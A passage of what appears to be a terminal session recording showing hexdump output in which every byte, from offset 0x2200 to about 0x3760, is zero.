2200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  22a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  22b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  22c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  22d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  22e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  22f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  23a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  23b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  23c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  23d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  23e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  23f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2440: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2460: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2470: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2490: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  24a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  24b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  24c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  24d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  24e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  24f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2570: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2590: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  25a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  25b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  25c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  25d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  25e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  25f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  26a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  26b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  26c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  26d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  26e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  26f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2730: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  27a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  27b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  27c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  27d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  27e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  27f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  28a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  28b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  28c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  28d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  28e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  28f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2920: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  29a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  29b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  29c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  29d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  29e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  29f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2a70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2a90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2aa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2ae0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2af0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2b00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2b10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2b20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2b30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2b40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2b50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2b60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2b70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2b90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2be0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2c70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2c90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2ca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2da0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2db0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2dc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2dd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2de0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2df0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2e10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2e20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2e30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2e40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2e50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2e60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2e70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2e90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n"]
[49.43507, "o", "  2ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2f10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2f20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2f30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2f40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2f50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2f60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2f70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2f90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  2ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  30a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  30b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  30c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  30d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  30e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  30f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  31a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  31b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  31c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  31d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  31e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  31f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3200: 00 00 00 00 00 00 00 00 00 00 00 00 0"]
[49.435514, "o", "0 00 00 00  ................\r\n  3210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  32a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  32b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  32c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  32d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  32e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  32f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  33a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  33b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  33c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  33d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  33e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  33f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3440: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3460: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3470: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3490: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  34a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  34b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  34c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  34d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  34e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  34f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3570: 00 00 0"]
[49.435751, "o", "0 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3590: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  35a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  35b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  35c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  35d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  35e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  35f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  36a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  36b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  36c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  36d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  36e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  36f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3730: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  3760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  